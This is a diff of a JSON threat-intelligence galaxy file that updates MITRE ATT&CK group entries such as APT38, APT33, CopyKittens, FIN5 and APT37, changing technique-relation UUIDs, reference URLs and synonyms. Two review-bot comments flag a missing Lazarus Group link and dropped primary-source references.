"b80d107d-fa0d-4b60-9684-b0433e8bdba0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "d45a3d09-b3cf-48f4-9f0f-f521ee5cb05c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + } + ], + "uuid": "00f67a77-86a4-4adf-be26-1a54fc713340", + "value": "APT38 - G0082" + }, { "description": "[TA459](https://attack.mitre.org/groups/G0062) is a threat group believed to operate out of China that has targeted countries including Russia, Belarus, Mongolia, and others. (Citation: Proofpoint TA459 April 2017)", "meta": { @@ -7735,7 +9116,14 @@ "type": "uses" }, { - "dest-uuid": "f4882e23-8aa7-4b12-b28a-b349c12ee9e0", + "dest-uuid": "4ab44516-ad75-4e43-a280-705dc0420e2f", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "6aac77c4-eaf2-4366-8c13-ce50ab951f38", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -7749,7 +9137,7 @@ "type": "uses" }, { - "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", + "dest-uuid": "be2dcee9-a7a7-4e38-afd6-21b31ecc3d63", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -7770,21 +9158,14 @@ "type": "uses" }, { - "dest-uuid": "be2dcee9-a7a7-4e38-afd6-21b31ecc3d63", + "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "4ab44516-ad75-4e43-a280-705dc0420e2f", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "6aac77c4-eaf2-4366-8c13-ce50ab951f38", + "dest-uuid": "f4882e23-8aa7-4b12-b28a-b349c12ee9e0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
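Review bot: The new APT38 cluster's description says some organisations file APT38 activity under the Lazarus Group (G0032) name, yet `synonyms` holds only `"APT38"` and every visible `related` edge is of type `uses`, so nothing machine-readable links this cluster to the Lazarus Group cluster and analysts correlating on either one will miss the overlap the prose describes. Consider adding a `related` entry pointing at the Lazarus Group cluster with a relation type other than `uses` and a likelihood tag weaker than `almost-certain`, matching the hedged wording of the description. I have not quoted a UUID because the Lazarus Group cluster is outside this view; it should be taken from the existing entry rather than minted.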
@@ -7832,10 +9213,7 @@ "meta": { "external_id": "G0052", "refs": [ - "https://attack.mitre.org/groups/G0052", - "http://www.clearskysec.com/copykitten-jpost/", - "http://www.clearskysec.com/wp-content/uploads/2017/07/Operation_Wilted_Tulip.pdf", - "https://s3-eu-west-1.amazonaws.com/minervaresearchpublic/CopyKittens/CopyKittens.pdf" + "https://attack.mitre.org/groups/G0052" ], "synonyms": [ "CopyKittens" @@ -7864,14 +9242,14 @@ "type": "uses" }, { - "dest-uuid": "aafea02e-ece5-4bb2-91a6-3bf8c7f38a39", + "dest-uuid": "b9f5dbe2-4c55-4fc5-af2e-d42c1d182ec4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "b9f5dbe2-4c55-4fc5-af2e-d42c1d182ec4", + "dest-uuid": "aafea02e-ece5-4bb2-91a6-3bf8c7f38a39", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -7897,6 +9275,13 @@ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "3433a9e8-1c47-4320-b9bf-ed449061d1c3", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "dcd81c6e-ebf7-4a16-93e0-9a97fa49c88a", 
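Review bot: The CopyKittens hunk at `@@ -7832` drops the three primary-source references (the two ClearSky write-ups, including the Operation Wilted Tulip PDF, and the Minerva CopyKittens report) and leaves only `"https://attack.mitre.org/groups/G0052"`, so the cluster now cites nothing but the aggregator it was generated from. Presumably this mirrors a change in the upstream ATT&CK STIX bundle rather than an editorial decision, but the galaxy loses the evidence an analyst needs to check the attribution and the technique mappings (including the `3433a9e8-…` edge this commit adds further down the same line). If the generator is the cause, consider merging previously published refs on regeneration instead of overwriting them, and at minimum restore the three URLs in this entry.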
@@ -7916,56 +9301,7 @@ }, "related": [ { - "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "b9f5dbe2-4c55-4fc5-af2e-d42c1d182ec4", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7fcbc4e8-1989-441f-9ac5-e7b6ff5806f1", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "1b84d551-6de8-4b96-9930-d177677c3b1d", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7dd95ff6-712e-4056-9626-312ea4ab4c5e", + "dest-uuid": "ca1a3f50-5ebd-41f8-8320-2c7d6a6e88be", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -7985,6 +9321,20 @@ ], "type": "uses" }, + { + "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b9f5dbe2-4c55-4fc5-af2e-d42c1d182ec4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", "tags": [ 
@@ -7993,63 +9343,7 @@ "type": "uses" }, { - "dest-uuid": "62dfd1ca-52d5-483c-a84b-d6e80bf94b7b", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "3c4a2599-71ee-4405-ba1e-0e28414b4bc5", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "d54416bd-0803-41ca-870a-ce1af7c05638", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "ca1a3f50-5ebd-41f8-8320-2c7d6a6e88be", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "774a3188-6ba9-4dc4-879d-d54ee48a5ce9", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -8063,14 +9357,56 @@ "type": "uses" }, { - "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "dest-uuid": "62dfd1ca-52d5-483c-a84b-d6e80bf94b7b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "f44731de-ea9f-406d-9b83-30ecbb9b4392", + "dest-uuid": "7fcbc4e8-1989-441f-9ac5-e7b6ff5806f1", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7dd95ff6-712e-4056-9626-312ea4ab4c5e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "d54416bd-0803-41ca-870a-ce1af7c05638", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "2e45723a-31da-4a7e-aaa6-e01998a6788f", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -8083,6 +9419,20 @@ ], "type": "uses" }, + { + "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", "tags": [ 
@@ -8091,7 +9441,42 @@ "type": "uses" }, { - "dest-uuid": "2e45723a-31da-4a7e-aaa6-e01998a6788f", + "dest-uuid": "3c4a2599-71ee-4405-ba1e-0e28414b4bc5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "1b84d551-6de8-4b96-9930-d177677c3b1d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f44731de-ea9f-406d-9b83-30ecbb9b4392", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "774a3188-6ba9-4dc4-879d-d54ee48a5ce9", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -8108,10 +9493,12 @@ "refs": [ "https://attack.mitre.org/groups/G0064", "https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html", - "https://www.brighttalk.com/webcast/10703/275683" + "https://www.brighttalk.com/webcast/10703/275683", + "https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage" ], "synonyms": [ - "APT33" + "APT33", + "Elfin" ] }, "related": [ @@ -8137,7 +9524,7 @@ "type": "uses" }, { - "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", + "dest-uuid": "8c32eb4d-805f-4fc5-bf60-c4d476c131b5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -8151,7 +9538,7 @@ "type": "uses" }, { - "dest-uuid": "8c32eb4d-805f-4fc5-bf60-c4d476c131b5", + "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -8163,6 +9550,223 @@ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "b4d80f8b-d2b9-4448-8844-4bef777ed676", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "90ac9266-68ce-46f2-b24f-5eb3b2a8ea38", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "3433a9e8-1c47-4320-b9bf-ed449061d1c3", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "cb69b20d-56d0-41ab-8440-4a4b251614d4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "be2dcee9-a7a7-4e38-afd6-21b31ecc3d63", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f5352566-1a64-49ac-8f7f-97e1d1a03300", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "03342581-f790-4f03-ba41-e82e67392e23", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "8901ac23-6b50-410c-b0dd-d8174a86f9b3", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "cf23bf4a-e003-4116-bbae-1ea6c558d565", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "afc079f3-c0ea-4096-b75d-3f05338b7f60", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "3257eb21-f9a7-4430-8de1-d8b6e288f529", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", + "tags": [ + 
"estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b9f5dbe2-4c55-4fc5-af2e-d42c1d182ec4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f4882e23-8aa7-4b12-b28a-b349c12ee9e0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b76b2d94-60e4-4107-a903-4a3a7622fb3b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "a19e86f8-1c0a-4fea-8407-23b73d615776", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "c848fcf7-6b62-4bde-8216-b6c157d48da0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "35dd844a-b219-4e2b-a6bb-efa9a75995a9", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "cc7b8c4e-9be0-47ca-b0bb-83915ec3ee2f", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5", + "tags": [ + 
"estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b21c3b2d-02e6-45b1-980b-e69051040839", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f879d51c-5476-431c-aedf-f14d207e4d1e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "13cd9151-83b7-410d-9f98-25d0f0d1d80d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e85cae1a-bce3-4ac4-b36b-b00acac0567b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "a93494bb-4b80-4ea1-8695-3236a49916fd", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "853c4192-4311-43e1-bfbb-b11b14911852", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "4b57c098-f043-4da2-83ef-7588a6d426bc", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "fbd29c89-18ba-4c2d-b792-51c0adee049f", @@ -8222,6 +9826,13 @@ ], "type": "uses" }, + { + "dest-uuid": "c848fcf7-6b62-4bde-8216-b6c157d48da0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", "tags": [ @@ -8230,7 +9841,7 @@ "type": "uses" }, { - "dest-uuid": "c848fcf7-6b62-4bde-8216-b6c157d48da0", + "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -8249,13 +9860,6 @@ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" - }, - { - "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" } ], "uuid": "7331c66a-5601-4d3f-acf6-ad9e3035eb40", @@ -8268,8 +9872,8 @@ "refs": [ "https://attack.mitre.org/groups/G0053", "https://www2.fireeye.com/WBNR-Are-you-ready-to-respond.html", - "https://www.darkreading.com/analytics/prolific-cybercrime-gang-favors-legit-login-credentials/d/d-id/1322645?", - "https://www.youtube.com/watch?v=fevGZs0EQu8" + "https://www.youtube.com/watch?v=fevGZs0EQu8", + "https://www.darkreading.com/analytics/prolific-cybercrime-gang-favors-legit-login-credentials/d/d-id/1322645?" ], "synonyms": [ "FIN5" @@ -8284,14 +9888,14 @@ "type": "uses" }, { - "dest-uuid": "7dd95ff6-712e-4056-9626-312ea4ab4c5e", + "dest-uuid": "6aabc5ec-eae6-422c-8311-38d45ee9838a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "799ace7f-e227-4411-baa0-8868704f2a69", + "dest-uuid": "ff6caf67-ea1f-4895-b80e-4bb0fc31c6db", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -8305,14 +9909,21 @@ "type": "uses" }, { - "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", + "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "10d51417-ee35-4589-b1ff-b6df1c334e8d", + "dest-uuid": "9752aef4-a1f3-4328-929f-b64eb0536090", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e358d692-23c0-4a31-9eb6-ecc13a8d7735", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -8333,49 +9944,14 @@ "type": "uses" }, { - "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", + "dest-uuid": "799ace7f-e227-4411-baa0-8868704f2a69", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "ff6caf67-ea1f-4895-b80e-4bb0fc31c6db", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "e358d692-23c0-4a31-9eb6-ecc13a8d7735", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "6aabc5ec-eae6-422c-8311-38d45ee9838a", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "9752aef4-a1f3-4328-929f-b64eb0536090", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "30208d3e-0d6b-43c8-883e-44462a514619", + "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -8387,6 +9963,34 @@ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "7dd95ff6-712e-4056-9626-312ea4ab4c5e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "10d51417-ee35-4589-b1ff-b6df1c334e8d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "30208d3e-0d6b-43c8-883e-44462a514619", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "85403903-15e0-4f9f-9be4-a259ecad4022", 
@@ -8434,18 +10038,20 @@ "value": "Dragonfly - G0035" }, { - "description": "[APT37](https://attack.mitre.org/groups/G0067) is a suspected North Korean cyber espionage group that has been active since at least 2012. The group has targeted victims primarily in South Korea, but also in Japan, Vietnam, Russia, Nepal, China, India, Romania, Kuwait, and other parts of the Middle East. [APT37](https://attack.mitre.org/groups/G0067) has also been linked to following campaigns between 2016-2018: Operation Daybreak, Operation Erebus, Golden Time, Evil New Year, Are you Happy?, FreeMilk, Northern Korean Human Rights, and Evil New Year 2018. (Citation: FireEye APT37 Feb 2018) (Citation: Securelist ScarCruft Jun 2016) (Citation: Talos Group123)", + "description": "[APT37](https://attack.mitre.org/groups/G0067) is a suspected North Korean cyber espionage group that has been active since at least 2012. The group has targeted victims primarily in South Korea, but also in Japan, Vietnam, Russia, Nepal, China, India, Romania, Kuwait, and other parts of the Middle East. [APT37](https://attack.mitre.org/groups/G0067) has also been linked to following campaigns between 2016-2018: Operation Daybreak, Operation Erebus, Golden Time, Evil New Year, Are you Happy?, FreeMilk, Northern Korean Human Rights, and Evil New Year 2018. (Citation: FireEye APT37 Feb 2018) (Citation: Securelist ScarCruft Jun 2016) (Citation: Talos Group123)\n\nNorth Korean group definitions are known to have significant overlap, and the name [Lazarus Group](https://attack.mitre.org/groups/G0032) is known to encompass a broad range of activity. 
Some organizations use the name Lazarus Group to refer to any activity attributed to North Korea.(Citation: US-CERT HIDDEN COBRA June 2017) Some organizations track North Korean clusters or groups such as Bluenoroff,(Citation: Kaspersky Lazarus Under The Hood Blog 2017), [APT37](https://attack.mitre.org/groups/G0067), and [APT38](https://attack.mitre.org/groups/G0082) separately, while other organizations may track some activity associated with those group names by the name Lazarus Group.", "meta": { "external_id": "G0067", "refs": [ "https://attack.mitre.org/groups/G0067", - "https://securelist.com/operation-daybreak/75100/", "https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf", - "https://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html" + "https://securelist.com/operation-daybreak/75100/", + "https://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html", + "https://www.us-cert.gov/ncas/alerts/TA17-164A", + "https://securelist.com/lazarus-under-the-hood/77908/" ], "synonyms": [ - "ScarCruft", "APT37", + "ScarCruft", "Reaper", "Group123", "TEMP.Reaper" @@ -8474,14 +10080,21 @@ "type": "uses" }, { - "dest-uuid": "6aac77c4-eaf2-4366-8c13-ce50ab951f38", + "dest-uuid": "be2dcee9-a7a7-4e38-afd6-21b31ecc3d63", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", + "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "60a9c2f0-b7a5-4e8e-959c-e1a3ff314a5f", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -8502,77 +10115,7 @@ "type": "uses" }, { - "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "0852567d-7958-4f4b-8947-4f840ec8d57d", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "414dc555-c79e-4b24-a2da-9b607f7eaf16", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "d742a578-d70e-4d0e-96a6-02a9c30204e6", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "1035cdf2-3e5f-446f-a7a7-e8f6d7925967", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "be2dcee9-a7a7-4e38-afd6-21b31ecc3d63", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "391d824f-0ef1-47a0-b0ee-c59a75e27670", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "211cfe9f-2676-4e1c-a5f5-2c8091da2a68", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "49abab73-3c5c-476e-afd5-69b5c732d845", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -8585,13 +10128,6 @@ ], "type": "uses" }, - { - "dest-uuid": "f879d51c-5476-431c-aedf-f14d207e4d1e", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", "tags": [ @@ -8600,56 +10136,21 @@ "type": "uses" }, { - "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", + "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "53d47b09-09c2-4015-8d37-6633ecd53f79", + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "53a42597-1974-4b8e-84fd-3675e8992053", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "830c9528-df21-472c-8c14-a036bf17d665", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "edbe24e9-aec4-4994-ac75-6a6bc7f1ddd0", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "dest-uuid": "1035cdf2-3e5f-446f-a7a7-e8f6d7925967", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
